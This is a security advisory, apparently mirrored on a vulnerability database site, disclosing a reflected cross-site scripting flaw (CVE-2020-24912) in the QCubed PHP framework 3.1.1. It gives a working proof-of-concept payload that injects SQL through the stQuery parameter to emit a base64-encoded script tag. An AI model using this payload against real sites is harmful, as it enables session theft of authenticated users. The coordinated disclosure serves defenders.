Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormWolfgang HotwagnerPACKETSTORM:161763
HistoryMar 12, 2021 - 12:00 a.m.

QCubed 3.1.1 Cross Site Scripting

2021-03-1200:00:00
Wolfgang Hotwagner
packetstormsecurity.com
210
JSON
`  
QCube Cross-Site-Scripting  
======================  
| Identifier: | AIT-SA-20210215-03 |  
| Target: | QCubed Framework |  
| Vendor: | QCubed |  
| Version: | all versions including 3.1.1 |  
| CVE: | CVE-2020-24912 |  
| Accessibility: | Remote |  
| Severity: | High |  
| Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) |  
  
SUMMARY  
=======  
QCubed is a PHP Model-View-Controller Rappid Application Development framework. (https://github.com/qcubed/qcubed)  
  
VULNERABILITY DESCRIPTION  
=========================  
A reflected cross-site scripting (XSS) vulnerability in qcubed (all versions including 3.1.1) in profile.php via the stQuery-parameter allows unauthenticated attackers to steal sessions of authenticated users.  
  
PROOF OF CONCEPT  
=================  
The XSS occurs because the SQL-output in profile.php is not sanitized properly. Since we are able to tamper the output using a SQL-injection(CVE-2020-24913), we can easily output a common XSS string.  
  
We use the following payload(unencoded):  
  
```  
a:1:{i:0;a:3:{s:12:"objBacktrace";a:1:{s:4:"args";a:1:{i:0;s:3:"PWN";}}s:8:"strQuery";s:112:"select version(); select convert_from(decode($$PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4K$$,$$base64$$),$$utf-8$$)";s:11:"dblTimeInfo";s:1:"1";}}  
```  
  
PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4K is unencoded:  
  
```  
"<script>alert(‘xss’)</script>"  
```  
  
VULNERABLE VERSIONS  
===================  
All versions including 3.1.1 are affected.  
  
  
TESTED VERSIONS  
===============  
QCubed 3.1.1  
  
IMPACT  
======  
An unauthenticated attacker could steal sessions of authenticated users.  
  
MITIGATION  
==========  
  
A patch was delivered by QCubed that allows to disable the profile-functionality( https://github.com/qcubed/qcubed/pull/1320/files ).  
  
VENDOR CONTACT TIMELINE  
=======================   
  
| 2020-04-19 | Contacting the vendor |  
| 2020-04-19 | Vendor replied |  
| 2020-05-01 | Vendor released a patch at Github |  
| 2021-02-15 | Public disclosure |  
  
ADVISORY URL  
============  
[https://www.ait.ac.at/ait-sa-20210215-03-xss-qcubed](https://www.ait.ac.at/ait-sa-20210215-03-xss-qcubed)  
  
  
  
  
`

Related

zdt 2
osv 2
packetstorm 1
prion 2
cve 2
nuclei 1
wallarmlab 1
zdt
zdt
QCubed 3.1.1 Cross Site Scripting Vulnerability
2021-03-13 00:00:00
QCubed 3.1.1 SQL Injection Vulnerability
2021-03-13 00:00:00
osv
osv
CVE-2020-24913
2021-03-04 13:15:15
CVE-2020-24912
2021-03-04 13:15:14
packetstorm
packetstorm
QCubed 3.1.1 SQL Injection
2021-03-12 00:00:00
prion
prion
Sql injection
2021-03-04 13:15:00
Cross site scripting
2021-03-04 13:15:00
cve
cve
CVE-2020-24913
2021-03-04 13:15:00
CVE-2020-24912
2021-03-04 13:15:00
nuclei
nuclei
QCube Cross-Site-Scripting
2021-09-15 06:00:51
wallarmlab
wallarmlab
Web vulnerabilities exploit weekly digest #1. March 8-15th 2021. VMware vCenter and Apache OFBiz RCE.
2021-03-16 18:22:00
JSON
Related for PACKETSTORM:161763
zdt2osv2packetstorm1prion2cve2nuclei1wallarmlab1